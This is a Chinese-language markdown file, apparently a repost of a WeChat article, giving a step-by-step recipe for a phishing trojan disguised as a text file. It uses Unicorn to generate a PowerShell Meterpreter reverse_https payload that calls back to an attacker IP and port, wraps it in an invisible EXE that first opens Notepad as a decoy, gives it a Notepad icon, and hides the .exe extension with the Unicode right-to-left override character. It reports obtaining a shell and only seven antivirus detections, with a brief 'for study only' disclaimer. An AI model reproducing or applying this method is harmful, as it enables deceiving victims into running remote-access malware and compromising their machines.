Skip to content

Latest commit

 

History

History
129 lines (71 loc) · 6.14 KB

一个免杀钓鱼思路分享.md

File metadata and controls

129 lines (71 loc) · 6.14 KB
Raw

> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/stD0-yf4IGrFBBtFJDoFkQ)

左侧的文件是真实文本文件。右边的文件是 PowerShell 有效负载,两者看起来基本一模一样,可以看到都是. txt 的文件名。打开我们的木马文件跟我们打开笔记本应用没有任何分别。

但是我们的木马在后台悄悄执行了。CS MSF 等等 C2 正常上线。

1. 生成 shellcode

1. 我们使用 CS MSF 等等 C2 生成的 powershell 等 shellcode.

这里使用 MSF 演示。然后为了方便免杀,我们联动一个名为 Unicorn 的工具来生成 shellcode 吧。

Unicorn 工具的主要作用是将复杂的 shellcode 有效负载直接注入内存。这样能达到一些免杀的作用。

在 kali 中使用 git clone github.com/trustedsec/unicorn 克隆 Unicorn GitHub 存储库。

进入 Unicorn 文件目录, 然后

./unicorn.py windows/meterpreter/reverse\_https 192.168.50.146 4444

Unicorn 将使用 Metasploit reverse_https 模块通过指定的端口连接到攻击者的 IP 地址。

会生成一个 powershell 的 shellcode 文件. txt 和一个 MSF 的配置文件. c

把生成的 unicorn.c 文件导进 MSF 中打开

MSF 会自动配置监听和其他配置。

我们看看原始的 Uniocrn 生成 shellcode 的免杀情况

还不错,其实这个 shellcode 直接使用也能上线的。但是我们的目的不是这个。

但是我们是钓鱼,钓鱼就一些迷惑的东西。将先前创建的 PowerShell 有效负载移至 Windows 系统,并另存为 payload.bat

我们去 https://github.com/B00merang-Project/Windows-10-Icons’下载 Windows 10 图标。

在 kali 中就使用 git 下载吧

git clone'https://github.com/B00merang-Project/Windows-10-Icons

该文件中可能不包含内置 Windows 10 图标的确切副本,但是看起来足够接近,可以很好地利用。也可以在网上设计图标或找到更好的图标

2. 将 PNG 转换为 ICO 格式

PNG 将需要转换为 Windows ICO 图标格式。可以使用在线工具(如 ConvertICO)完成此操作。只需将所需的 PNG 上传到网站,它将以 ICO 格式输出。

这里我们使用的是记事本的图标。

安装 BAT2EXE

在 Windows 中,访问以下 URL 以下载 B2E。

https://github.com/tokyoneon/B2E/raw/master/Bat\_To\_Exe\_Converter.zip

解压缩下载文件,然后运行 “Bat_To_Exe_Converter_(Installer).exe” 文件进行安装。

导入有效负载 BAT

完成后,启动 B2E,然后单击 “打开” 按钮以导入之前创建的 payload.bat。

导入木马有效载荷

然后,将单词 “notepad” 添加到 payload.bat 的顶部,然后单击“保存”。在执行 PowerShell 有效负载之前,这将使可执行文件在 Windows 计算机上打开记事本。这样做会使目标用户相信他们刚刚单击的文件确实是合法的文本文件。

转换和导出有效载荷

完成后,选中 “Icon” 选项将其启用,然后使用 “ …” 按钮导入在上一步中创建 ico 图标。然后,将 _Exe 格式_更改为 “64 位 Windows |(不可见)”,以防止在目标用户打开文件时弹出任何终端。

单击 “转换” 按钮以创建 EXE,然后将文件名另存为 txt.exe。

在将 txt.exe 保存到桌面并将其放置在真实文本文件旁边之后

ok 图标一样了,但是我们可以看到我们的木马文件是. exe 的,正常的文件是. txt 的。我们处理一下。

使用 Unicode 欺骗文件扩展名

使用称为 “从右到左覆盖”(RLO)(https://unicode-table.com/en/202E/)的 Unicode 字符来反转字符在文件名中的显示顺序。

看视频吧。。打字好累。。。

ok,成功返回 shell,视频中可以看到我们的木马跟正常的 txt 文件是一样的,也可以输入文字。我们来看看木马的免杀。

7 个,他妈的,问题不大,回去修修改改就可以,这里主要分享思路。

仅供安全学习,请不要非法攻击。

渗透测试 红队攻防 免杀 权限维持 等等技术 

及时分享最新漏洞复现以及 EXP 国内外最新技术分享!!!

进来一起学习吧